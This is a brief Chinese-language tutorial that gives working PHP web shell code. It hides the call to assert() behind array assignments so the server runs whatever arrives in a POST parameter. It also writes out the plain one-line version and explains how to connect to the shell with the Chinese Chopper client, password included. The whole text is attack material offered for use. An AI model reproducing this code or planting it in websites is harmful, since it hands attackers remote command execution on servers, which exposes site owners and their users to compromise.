<?php
$POST['POST']='assert';
$array[]=$POST;
$array[0]['POST']($_POST['assert'])
;?>assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数)
因为$array[], POST[]都是数组,所以$array[]=$POST,就是把$POST数组的值赋给$array数组
这样的话$array[0]['POST']的输出就是assert,所以组成了一句话木马
<?php assert($_POST['assert']);?>
构造菜刀 ip/www/index.php?POST=assert 密码为assert
